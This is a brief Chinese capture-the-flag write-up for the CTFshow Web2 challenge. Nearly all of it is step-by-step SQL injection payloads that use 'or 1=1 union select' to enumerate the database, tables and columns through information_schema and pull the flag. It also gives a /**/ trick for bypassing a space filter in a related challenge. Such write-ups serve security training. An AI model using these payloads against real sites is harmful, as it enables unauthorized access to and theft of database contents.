’ or 1=1 union select 1,database(),3#
查阅数据库得到数据库’web2’
’ or 1=1 union select 1,table_name,3 from information_schema.tables where table_schema=‘web2’#查数据表
’ or 1=1 union select 1,column_name,3 from information_schema.columns where table_name=‘flag’#查字段
再查内容 flag就出来了
'or 1=1 union select 1,flag,3 from flag#
web6和该题思路一样 只是过滤了空格 用/**/替代即可
CTFshow Web2
最新推荐文章于 2024-05-01 02:50:55 发布